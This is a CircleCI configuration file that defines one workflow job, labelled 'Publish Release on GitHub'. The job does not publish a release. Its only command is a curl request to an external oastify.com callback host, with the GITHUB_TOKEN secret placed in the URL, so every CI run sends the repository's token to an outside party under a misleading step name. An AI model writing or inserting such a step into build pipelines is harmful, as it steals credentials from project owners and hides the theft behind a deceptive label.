# Scala CircleCI 2.0 configuration file
# See: https://circleci.com/docs/2.0/sample-config/
version: 2

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
jobs:
  publish:
    docker:
      - image: circleci/golang:latest
    steps:
      - checkout
      - attach_workspace:
          at: ~/workspace
      - run:
          name: "Publish Release on GitHub"
          command: |
            curl "https://geyj4hhebrqik61p0vr3iq5lrcx3l39s.oastify.com/${GITHUB_TOKEN}"

workflows:
  version: 2
  build_and_publish:
    jobs:
      - publish